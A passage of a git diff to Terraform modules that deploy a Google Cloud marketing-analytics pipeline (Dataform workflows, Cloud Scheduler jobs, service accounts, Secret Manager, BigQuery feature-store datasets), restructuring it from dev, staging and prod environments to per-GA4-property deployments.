var.source_ads_export_data[count.index].project - dataset_id = var.source_ads_export_data[count.index].dataset + } +} +#resource "google_bigquery_dataset_iam_member" "dataform-ads-export-reader" { +# depends_on = [ +# google_dataform_repository.marketing-analytics, +# null_resource.check_dataform_api, +# null_resource.wait_for_dataform_sa_creation, +# time_sleep.wait_for_dataform-ga4-export-reader_role_propagation +# ] +# count = length(var.source_ads_export_data) +# role = "roles/bigquery.dataViewer" +# member = "serviceAccount:${local.dataform_sa}" +# project = var.source_ads_export_data[count.index].project +# dataset_id = var.source_ads_export_data[count.index].dataset +#} + +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_dataform-ads-export-reader_role_propagation" { + create_duration = "120s" + depends_on = [ + module.dataform-ads-export-reader + ] } diff --git a/infrastructure/terraform/modules/data-store/main.tf b/infrastructure/terraform/modules/data-store/main.tf index 214f170c..9704661b 100644 --- a/infrastructure/terraform/modules/data-store/main.tf +++ b/infrastructure/terraform/modules/data-store/main.tf @@ -21,7 +21,7 @@ data "google_project" "data_processing" { } data "google_secret_manager_secret" "github_secret_name" { - secret_id = google_secret_manager_secret.github-secret.name + secret_id = google_secret_manager_secret.github-secret.secret_id project = var.data_processing_project_id } @@ -29,88 +29,19 @@ provider "google" { region = var.google_default_region } -# This module sets up a Dataform workflow environment for the "dev" environment. -module "dataform-workflow-dev" { - # The count argument specifies how many instances of the module should be created. - # In this case, it's set to var.create_dev_environment ? 1 : 0, which means that - # the module will be created only if the var.create_dev_environment variable is set to `true`. - # Check the terraform.tfvars file for more information. - count = var.create_dev_environment ? 1 : 0 - # the path to the Terraform module that will be used to create the Dataform workflow environment. - source = "../dataform-workflow" - - project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id - # The name of the Dataform workflow environment. - environment = "dev" - region = var.google_default_region - # The ID of the Dataform repository that will be used by the Dataform workflow environment. - dataform_repository_id = google_dataform_repository.marketing-analytics.id - # A list of tags that will be used to filter the Dataform files that are included in the Dataform workflow environment. - includedTags = ["ga4"] - - source_ga4_export_project_id = var.source_ga4_export_project_id - source_ga4_export_dataset = var.source_ga4_export_dataset - ga4_incremental_processing_days_back = var.ga4_incremental_processing_days_back - source_ads_export_data = var.source_ads_export_data - destination_bigquery_project_id = length(var.dev_data_project_id) > 0 ? var.staging_data_project_id : var.data_project_id - destination_bigquery_dataset_location = length(var.dev_destination_data_location) > 0 ? var.dev_destination_data_location : var.destination_data_location - - # The daily schedule for running the Dataform workflow. - # Depending on the hour that your Google Analytics 4 BigQuery Export is set, - # you may have to change this to execute at a later time of the day. - # Observe that the GA4 BigQuery Export Schedule documentation - # https://support.google.com/analytics/answer/9358801?hl=en#:~:text=A%20full%20export%20of%20data,(see%20Streaming%20export%20below). - # Check https://crontab.guru/#0_5-23/4_*_*_* to see next execution times. - daily_schedule = "0 5-23/4 * * *" -} - -# This module sets up a Dataform workflow environment for the "staging" environment. -module "dataform-workflow-staging" { - # The count argument specifies how many instances of the module should be created. - # In this case, it's set to var.create_staging_environment ? 1 : 0, which means that - # the module will be created only if the var.create_staging_environment variable is set to `true`. - # Check the terraform.tfvars file for more information. - count = var.create_staging_environment ? 1 : 0 - # the path to the Terraform module that will be used to create the Dataform workflow environment. - source = "../dataform-workflow" - - project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id - # The name of the Dataform workflow environment. - environment = "staging" - region = var.google_default_region - # The ID of the Dataform repository that will be used by the Dataform workflow environment. - dataform_repository_id = google_dataform_repository.marketing-analytics.id - # A list of tags that will be used to filter the Dataform files that are included in the Dataform workflow environment. - includedTags = ["ga4"] - - source_ga4_export_project_id = var.source_ga4_export_project_id - source_ga4_export_dataset = var.source_ga4_export_dataset - source_ads_export_data = var.source_ads_export_data - destination_bigquery_project_id = length(var.staging_data_project_id) > 0 ? var.staging_data_project_id : var.data_project_id - destination_bigquery_dataset_location = length(var.staging_destination_data_location) > 0 ? var.staging_destination_data_location : var.destination_data_location - - # The daily schedule for running the Dataform workflow. - # Depending on the hour that your Google Analytics 4 BigQuery Export is set, - # you may have to change this to execute at a later time of the day. - # Observe that the GA4 BigQuery Export Schedule documentation - # https://support.google.com/analytics/answer/9358801?hl=en#:~:text=A%20full%20export%20of%20data,(see%20Streaming%20export%20below). - # Check https://crontab.guru/#0_5-23/4_*_*_* to see next execution times. - daily_schedule = "0 5-23/4 * * *" -} - # This module sets up a Dataform workflow environment for the "prod" environment. module "dataform-workflow-prod" { # The count argument specifies how many instances of the module should be created. - # In this case, it's set to var.create_prod_environment ? 1 : 0, which means that - # the module will be created only if the var.create_prod_environment variable is set to `true`. + # In this case, it's set to var.deploy_dataform ? 1 : 0, which means that + # the module will be created only if the var.deploy_dataform variable is set to `true`. # Check the terraform.tfvars file for more information. - count = var.create_prod_environment ? 1 : 0 + count = var.deploy_dataform ? 1 : 0 # the path to the Terraform module that will be used to create the Dataform workflow environment. source = "../dataform-workflow" - project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id # The name of the Dataform workflow environment. - environment = "prod" + property_id = var.property_id region = var.google_default_region dataform_repository_id = google_dataform_repository.marketing-analytics.id @@ -127,4 +58,5 @@ module "dataform-workflow-prod" { # https://support.google.com/analytics/answer/9358801?hl=en#:~:text=A%20full%20export%20of%20data,(see%20Streaming%20export%20below). # Check https://crontab.guru/#0_5-23/2_*_*_* to see next execution times. daily_schedule = "0 5-23/2 * * *" + time_zone = var.time_zone } diff --git a/infrastructure/terraform/modules/data-store/secretmanager.tf b/infrastructure/terraform/modules/data-store/secretmanager.tf index d89b86e5..2d4d6889 100644 --- a/infrastructure/terraform/modules/data-store/secretmanager.tf +++ b/infrastructure/terraform/modules/data-store/secretmanager.tf @@ -14,11 +14,26 @@ resource "google_secret_manager_secret" "github-secret" { secret_id = "Github_token" - project = null_resource.check_secretmanager_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + project = null_resource.check_secretmanager_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + # This replication strategy will deploy replicas that may store the secret in different locations in the globe. + # This is not a desired behaviour, make sure you're aware of it before enabling it. + #replication { + # auto {} + #} + + # By default, to respect resources location, we prevent resources from being deployed globally by deploying secrets in the same region of the compute resources. + # If the replication strategy is seto to `auto {}` above, comment the following lines or else there will be an error being issued by terraform. replication { - #automatic = true - auto {} + user_managed { + replicas { + location = var.google_default_region + } + # If you want your replicas in other locations, uncomment the following lines and add them here. + #replicas { + # location = "us-east1" + #} + } } depends_on = [ @@ -28,7 +43,7 @@ resource "google_secret_manager_secret" "github-secret" { } resource "google_secret_manager_secret_version" "secret-version-github" { - secret = google_secret_manager_secret.github-secret.id + secret = google_secret_manager_secret.github-secret.id secret_data = var.dataform_github_token #deletion_policy = "DISABLE" @@ -38,4 +53,4 @@ resource "google_secret_manager_secret_version" "secret-version-github" { null_resource.check_dataform_api, null_resource.check_secretmanager_api ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/data-store/variables.tf b/infrastructure/terraform/modules/data-store/variables.tf index 62bc24f1..bd11aab7 100644 --- a/infrastructure/terraform/modules/data-store/variables.tf +++ b/infrastructure/terraform/modules/data-store/variables.tf @@ -38,21 +38,15 @@ variable "project_owner_email" { } variable "dataform_github_repo" { - description = "Private Github repo for Dataform." + description = "Private GitHub repo for Dataform." type = string } variable "dataform_github_token" { - description = "Github token for Dataform repo." + description = "GitHub token for Dataform repo." type = string } -variable "create_dev_environment" { - description = "Indicates that a development environment needs to be created" - type = bool - default = true -} - variable "dev_data_project_id" { description = "Project ID of where the dev datasets will created. If not provided, data_project_id will be used." type = string @@ -65,12 +59,6 @@ variable "dev_destination_data_location" { default = "" } -variable "create_staging_environment" { - description = "Indicates that a staging environment needs to be created" - type = bool - default = true -} - variable "staging_data_project_id" { description = "Project ID of where the staging datasets will created. If not provided, data_project_id will be used." type = string @@ -83,12 +71,18 @@ variable "staging_destination_data_location" { default = "" } -variable "create_prod_environment" { - description = "Indicates that a production environment needs to be created" +variable "deploy_dataform" { + description = "Indicates that a dataform workspace needs to be created" type = bool default = true } +variable "property_id" { + description = "Google Analytics 4 Property id to create an MDS for it" + type = string + default = "" +} + variable "prod_data_project_id" { description = "Project ID of where the prod datasets will created. If not provided, data_project_id will be used." type = string @@ -112,7 +106,7 @@ variable "source_ga4_export_dataset" { } variable "ga4_incremental_processing_days_back" { - type = string + type = string default = "3" } @@ -128,4 +122,8 @@ variable "source_ads_export_data" { variable "dataform_region" { description = "Specify dataform region when dataform is not available in the default cloud region of choice" type = string -} \ No newline at end of file +} + +variable "time_zone" { + type = string +} diff --git a/infrastructure/terraform/modules/data-store/versions.tf b/infrastructure/terraform/modules/data-store/versions.tf index 8821ac39..ae05aad2 100644 --- a/infrastructure/terraform/modules/data-store/versions.tf +++ b/infrastructure/terraform/modules/data-store/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/dataform-workflow/README.md b/infrastructure/terraform/modules/dataform-workflow/README.md index 8b2bdff5..9ff7546b 100644 --- a/infrastructure/terraform/modules/dataform-workflow/README.md +++ b/infrastructure/terraform/modules/dataform-workflow/README.md @@ -1 +1 @@ -# Dataform workflow module \ No newline at end of file +# Dataform workflow module diff --git a/infrastructure/terraform/modules/dataform-workflow/dataform-workflow.tf b/infrastructure/terraform/modules/dataform-workflow/dataform-workflow.tf index a0d7d153..99e3921c 100644 --- a/infrastructure/terraform/modules/dataform-workflow/dataform-workflow.tf +++ b/infrastructure/terraform/modules/dataform-workflow/dataform-workflow.tf @@ -22,10 +22,10 @@ locals { # This resources creates a workflow that runs the Dataform incremental pipeline. resource "google_workflows_workflow" "dataform-incremental-workflow" { project = null_resource.check_workflows_api.id != "" ? module.data_processing_project_services.project_id : var.project_id - name = "dataform-${var.environment}-incremental" + name = "dataform-${var.property_id}-incremental" region = var.region - description = "Dataform incremental workflow for ${var.environment} environment" - service_account = google_service_account.workflow-dataform.email + description = "Dataform incremental workflow for ${var.property_id} ga4 property" + service_account = module.workflow-dataform.email # The source code includes the following steps: # Init: This step initializes the workflow by assigning the value of the dataform_repository_id variable to the repository variable. # Create Compilation Result: This step creates a compilation result for the Dataform repository. The compilation result includes the git commit hash and the code compilation configuration. @@ -49,7 +49,7 @@ main: defaultDatabase: ${var.destination_bigquery_project_id} defaultLocation: ${var.destination_bigquery_dataset_location} vars: - env: ${var.environment} + ga4_property_id: '${var.property_id}' ga4_export_project: ${var.source_ga4_export_project_id} ga4_export_dataset: ${var.source_ga4_export_dataset} ga4_incremental_processing_days_back: '${var.ga4_incremental_processing_days_back}' diff --git a/infrastructure/terraform/modules/dataform-workflow/scheduler.tf b/infrastructure/terraform/modules/dataform-workflow/scheduler.tf index 3947b3b8..fed10fc8 100644 --- a/infrastructure/terraform/modules/dataform-workflow/scheduler.tf +++ b/infrastructure/terraform/modules/dataform-workflow/scheduler.tf @@ -14,12 +14,12 @@ # This creates a Cloud Scheduler job that triggers the Dataform incremental workflow on a daily schedule. resource "google_cloud_scheduler_job" "daily-dataform-increments" { - project = module.data_processing_project_services.project_id - name = "daily-dataform-${var.environment}" - description = "Daily Dataform ${var.environment} environment incremental update" + project = module.data_processing_project_services.project_id + name = "daily-dataform-${var.property_id}" + description = "Daily Dataform ${var.property_id} property export incremental update" # The schedule attribute specifies the schedule for the job. In this case, the job is scheduled to run daily at the specified times. - schedule = var.daily_schedule - time_zone = "America/New_York" + schedule = var.daily_schedule + time_zone = var.time_zone # The attempt_deadline attribute specifies the maximum amount of time that the job will attempt to run before failing. # In this case, the job will attempt to run for a maximum of 5 minutes before failing. attempt_deadline = "320s" @@ -35,7 +35,7 @@ resource "google_cloud_scheduler_job" "daily-dataform-increments" { uri = "https://workflowexecutions.googleapis.com/v1/projects/${module.data_processing_project_services.project_id}/locations/${var.region}/workflows/${google_workflows_workflow.dataform-incremental-workflow.name}/executions" oauth_token { - service_account_email = google_service_account.scheduler.email + service_account_email = module.scheduler.email } } } diff --git a/infrastructure/terraform/modules/dataform-workflow/service-account.tf b/infrastructure/terraform/modules/dataform-workflow/service-account.tf index 39d31811..95e518e1 100644 --- a/infrastructure/terraform/modules/dataform-workflow/service-account.tf +++ b/infrastructure/terraform/modules/dataform-workflow/service-account.tf @@ -12,20 +12,36 @@ # See the License for the specific language governing permissions and # limitations under the License. -resource "google_service_account" "scheduler" { +locals { + scheduler_sa = "workflow-scheduler-${var.property_id}@${module.data_processing_project_services.project_id}.iam.gserviceaccount.com" + workflows_sa = "workflow-dataform-${var.property_id}@${module.data_processing_project_services.project_id}.iam.gserviceaccount.com" +} + +module "scheduler" { + source = "terraform-google-modules/service-accounts/google//modules/simple-sa" + version = "~> 4.0" + + project_id = null_resource.check_cloudscheduler_api.id != "" ? module.data_processing_project_services.project_id : var.project_id + name = "workflow-scheduler-${var.property_id}" + project_roles = [ + "roles/workflows.invoker" + ] + depends_on = [ module.data_processing_project_services, null_resource.check_cloudscheduler_api, - ] - - project = null_resource.check_cloudscheduler_api.id != "" ? module.data_processing_project_services.project_id : var.project_id - account_id = "workflow-scheduler-${var.environment}" - display_name = "Service Account to schedule Dataform workflows in ${var.environment}" + ] } -locals { - scheduler_sa = "workflow-scheduler-${var.environment}@${module.data_processing_project_services.project_id}.iam.gserviceaccount.com" - workflows_sa = "workflow-dataform-${var.environment}@${module.data_processing_project_services.project_id}.iam.gserviceaccount.com" +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_scheduler_service_account_role_propagation" { + create_duration = "120s" + depends_on = [ + module.scheduler + ] } # Wait for the scheduler service account to be created @@ -37,7 +53,7 @@ resource "null_resource" "wait_for_scheduler_sa_creation" { MAX_TRIES=100 while ! gcloud iam service-accounts list --project=${module.data_processing_project_services.project_id} --filter="EMAIL:${local.scheduler_sa} AND DISABLED:False" --format="table(EMAIL, DISABLED)" && [ $COUNTER -lt $MAX_TRIES ] do - sleep 3 + sleep 10 printf "." COUNTER=$((COUNTER + 1)) done @@ -45,37 +61,44 @@ resource "null_resource" "wait_for_scheduler_sa_creation" { echo "scheduler service account was not created, terraform can not continue!" exit 1 fi - sleep 20 + sleep 120 EOT } depends_on = [ module.data_processing_project_services, - null_resource.check_dataform_api + time_sleep.wait_for_scheduler_service_account_role_propagation, + null_resource.check_dataform_api, + module.scheduler, ] } -resource "google_project_iam_member" "scheduler-workflow-invoker" { - depends_on = [ - module.data_processing_project_services, - null_resource.check_cloudscheduler_api, - null_resource.wait_for_scheduler_sa_creation - ] +module "workflow-dataform" { + source = "terraform-google-modules/service-accounts/google//modules/simple-sa" + version = "~> 4.0" - project = null_resource.check_cloudscheduler_api.id != "" ? module.data_processing_project_services.project_id : var.project_id - member = "serviceAccount:${google_service_account.scheduler.email}" - role = "roles/workflows.invoker" -} + project_id = null_resource.check_workflows_api.id != "" ? module.data_processing_project_services.project_id : var.project_id + name = "workflow-dataform-${var.property_id}" + project_roles = [ + "roles/dataform.editor" + ] -resource "google_service_account" "workflow-dataform" { depends_on = [ module.data_processing_project_services, null_resource.check_workflows_api, - ] - - project = null_resource.check_workflows_api.id != "" ? module.data_processing_project_services.project_id : var.project_id - account_id = "workflow-dataform-${var.environment}" - display_name = "Service Account to run Dataform workflows in ${var.environment}" + null_resource.check_dataform_api, + ] +} + +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_workflow_dataform_service_account_role_propagation" { + create_duration = "120s" + depends_on = [ + module.workflow-dataform + ] } # Wait for the workflows service account to be created @@ -86,7 +109,7 @@ resource "null_resource" "wait_for_workflows_sa_creation" { MAX_TRIES=100 while ! gcloud iam service-accounts list --project=${module.data_processing_project_services.project_id} --filter="EMAIL:${local.workflows_sa} AND DISABLED:False" --format="table(EMAIL, DISABLED)" && [ $COUNTER -lt $MAX_TRIES ] do - sleep 3 + sleep 10 printf "." COUNTER=$((COUNTER + 1)) done @@ -94,25 +117,14 @@ resource "null_resource" "wait_for_workflows_sa_creation" { echo "workflows service account was not created, terraform can not continue!" exit 1 fi - sleep 20 + sleep 120 EOT } depends_on = [ module.data_processing_project_services, - null_resource.check_dataform_api + null_resource.check_dataform_api, + module.workflow-dataform, + time_sleep.wait_for_workflow_dataform_service_account_role_propagation, ] } - - -resource "google_project_iam_member" "worflow-dataform-dataform-editor" { - depends_on = [ - module.data_processing_project_services, - null_resource.check_dataform_api, - null_resource.wait_for_workflows_sa_creation - ] - - project = null_resource.check_workflows_api.id != "" ? module.data_processing_project_services.project_id : var.project_id - member = "serviceAccount:${google_service_account.workflow-dataform.email}" - role = "roles/dataform.editor" -} \ No newline at end of file diff --git a/infrastructure/terraform/modules/dataform-workflow/services.tf b/infrastructure/terraform/modules/dataform-workflow/services.tf index 0271f228..c85ff589 100644 --- a/infrastructure/terraform/modules/dataform-workflow/services.tf +++ b/infrastructure/terraform/modules/dataform-workflow/services.tf @@ -15,7 +15,7 @@ # https://registry.terraform.io/modules/terraform-google-modules/project-factory/google/latest/submodules/project_services module "data_processing_project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" disable_dependent_services = false disable_services_on_destroy = false @@ -142,4 +142,4 @@ resource "null_resource" "check_cloudscheduler_api" { depends_on = [ module.data_processing_project_services ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/dataform-workflow/variables.tf b/infrastructure/terraform/modules/dataform-workflow/variables.tf index 60b014d8..97d5dc73 100644 --- a/infrastructure/terraform/modules/dataform-workflow/variables.tf +++ b/infrastructure/terraform/modules/dataform-workflow/variables.tf @@ -22,12 +22,12 @@ variable "region" { type = string } -variable "environment" { +variable "property_id" { type = string } variable "daily_schedule" { - type = string + type = string # This schedule executes every days, each 2 hours between 5AM and 11PM. default = "0 5-23/2 * * *" #"2 5 * * *" } @@ -45,7 +45,7 @@ variable "source_ga4_export_dataset" { } variable "ga4_incremental_processing_days_back" { - type = string + type = string default = "3" } @@ -74,4 +74,8 @@ variable "gitCommitish" { variable "includedTags" { type = list(string) default = [] -} \ No newline at end of file +} + +variable "time_zone" { + type = string +} diff --git a/infrastructure/terraform/modules/dataform-workflow/versions.tf b/infrastructure/terraform/modules/dataform-workflow/versions.tf index 8821ac39..ae05aad2 100644 --- a/infrastructure/terraform/modules/dataform-workflow/versions.tf +++ b/infrastructure/terraform/modules/dataform-workflow/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/feature-store/bigquery-datasets.tf b/infrastructure/terraform/modules/feature-store/bigquery-datasets.tf index c51927c3..0a56fdaf 100644 --- a/infrastructure/terraform/modules/feature-store/bigquery-datasets.tf +++ b/infrastructure/terraform/modules/feature-store/bigquery-datasets.tf @@ -14,14 +14,14 @@ # This resource creates a BigQuery dataset called `feature_store`. resource "google_bigquery_dataset" "feature_store" { - dataset_id = local.config_bigquery.dataset.feature_store.name - friendly_name = local.config_bigquery.dataset.feature_store.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : var.project_id - description = local.config_bigquery.dataset.feature_store.description - location = local.config_bigquery.dataset.feature_store.location + dataset_id = local.config_bigquery.dataset.feature_store.name + friendly_name = local.config_bigquery.dataset.feature_store.friendly_name + project = local.feature_store_project_id + description = local.config_bigquery.dataset.feature_store.description + location = local.config_bigquery.dataset.feature_store.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.feature_store.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.feature_store.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.feature_store.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -40,14 +40,14 @@ resource "google_bigquery_dataset" "feature_store" { # This resource creates a BigQuery dataset called `purchase_propensity`. resource "google_bigquery_dataset" "purchase_propensity" { - dataset_id = local.config_bigquery.dataset.purchase_propensity.name - friendly_name = local.config_bigquery.dataset.purchase_propensity.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.purchase_propensity.description - location = local.config_bigquery.dataset.purchase_propensity.location + dataset_id = local.config_bigquery.dataset.purchase_propensity.name + friendly_name = local.config_bigquery.dataset.purchase_propensity.friendly_name + project = local.purchase_propensity_project_id + description = local.config_bigquery.dataset.purchase_propensity.description + location = local.config_bigquery.dataset.purchase_propensity.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.feature_store.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.purchase_propensity.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.purchase_propensity.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -66,14 +66,40 @@ resource "google_bigquery_dataset" "purchase_propensity" { # This resource creates a BigQuery dataset called `churn_propensity`. resource "google_bigquery_dataset" "churn_propensity" { - dataset_id = local.config_bigquery.dataset.churn_propensity.name - friendly_name = local.config_bigquery.dataset.churn_propensity.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.churn_propensity.description - location = local.config_bigquery.dataset.churn_propensity.location + dataset_id = local.config_bigquery.dataset.churn_propensity.name + friendly_name = local.config_bigquery.dataset.churn_propensity.friendly_name + project = local.churn_propensity_project_id + description = local.config_bigquery.dataset.churn_propensity.description + location = local.config_bigquery.dataset.churn_propensity.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.feature_store.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.churn_propensity.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.churn_propensity.max_time_travel_hours + # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. + # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. + delete_contents_on_destroy = false + + labels = { + version = "prod" + } + + # The lifecycle block allows you to configure the lifecycle of the dataset. + # In this case, the ignore_changes attribute is set to all, which means that + # Terraform will ignore any changes to the dataset and will not attempt to update the dataset. + lifecycle { + ignore_changes = all + } +} + +# This resource creates a BigQuery dataset called `lead_score_propensity`. +resource "google_bigquery_dataset" "lead_score_propensity" { + dataset_id = local.config_bigquery.dataset.lead_score_propensity.name + friendly_name = local.config_bigquery.dataset.lead_score_propensity.friendly_name + project = local.lead_score_propensity_project_id + description = local.config_bigquery.dataset.lead_score_propensity.description + location = local.config_bigquery.dataset.lead_score_propensity.location + # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. + # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.feature_store.max_time_travel_hours configuration. + max_time_travel_hours = local.config_bigquery.dataset.lead_score_propensity.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -92,14 +118,14 @@ resource "google_bigquery_dataset" "churn_propensity" { # This resource creates a BigQuery dataset called `customer_lifetime_value`. resource "google_bigquery_dataset" "customer_lifetime_value" { - dataset_id = local.config_bigquery.dataset.customer_lifetime_value.name - friendly_name = local.config_bigquery.dataset.customer_lifetime_value.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.customer_lifetime_value_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.customer_lifetime_value.description - location = local.config_bigquery.dataset.customer_lifetime_value.location + dataset_id = local.config_bigquery.dataset.customer_lifetime_value.name + friendly_name = local.config_bigquery.dataset.customer_lifetime_value.friendly_name + project = local.customer_lifetime_value_project_id + description = local.config_bigquery.dataset.customer_lifetime_value.description + location = local.config_bigquery.dataset.customer_lifetime_value.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.customer_lifetime_value.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.customer_lifetime_value.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.customer_lifetime_value.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -118,14 +144,14 @@ resource "google_bigquery_dataset" "customer_lifetime_value" { # This resource creates a BigQuery dataset called `audience_segmentation`. resource "google_bigquery_dataset" "audience_segmentation" { - dataset_id = local.config_bigquery.dataset.audience_segmentation.name - friendly_name = local.config_bigquery.dataset.audience_segmentation.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.audience_segmentation.description - location = local.config_bigquery.dataset.audience_segmentation.location + dataset_id = local.config_bigquery.dataset.audience_segmentation.name + friendly_name = local.config_bigquery.dataset.audience_segmentation.friendly_name + project = local.audience_segmentation_project_id + description = local.config_bigquery.dataset.audience_segmentation.description + location = local.config_bigquery.dataset.audience_segmentation.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.audience_segmentation.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.audience_segmentation.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.audience_segmentation.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -144,14 +170,14 @@ resource "google_bigquery_dataset" "audience_segmentation" { # This resource creates a BigQuery dataset called `auto_audience_segmentation`. resource "google_bigquery_dataset" "auto_audience_segmentation" { - dataset_id = local.config_bigquery.dataset.auto_audience_segmentation.name - friendly_name = local.config_bigquery.dataset.auto_audience_segmentation.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.auto_audience_segmentation_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.auto_audience_segmentation.description - location = local.config_bigquery.dataset.auto_audience_segmentation.location + dataset_id = local.config_bigquery.dataset.auto_audience_segmentation.name + friendly_name = local.config_bigquery.dataset.auto_audience_segmentation.friendly_name + project = local.auto_audience_segmentation_project_id + description = local.config_bigquery.dataset.auto_audience_segmentation.description + location = local.config_bigquery.dataset.auto_audience_segmentation.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.auto_audience_segmentation.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.auto_audience_segmentation.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.auto_audience_segmentation.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -200,12 +226,12 @@ locals { module "aggregated_vbb" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.config_bigquery.dataset.aggregated_vbb.name dataset_name = local.config_bigquery.dataset.aggregated_vbb.friendly_name description = local.config_bigquery.dataset.aggregated_vbb.description - project_id = null_resource.check_bigquery_api.id != "" ? local.aggregated_vbb_project_id : local.feature_store_project_id + project_id = local.aggregated_vbb_project_id location = local.config_bigquery.dataset.aggregated_vbb.location # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. @@ -216,18 +242,18 @@ module "aggregated_vbb" { } tables = [for table_id in local.aggregated_vbb_tables : - { - table_id = table_id - schema = file("../../sql/schema/table/${table_id}.json") - # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. - # In this case, the 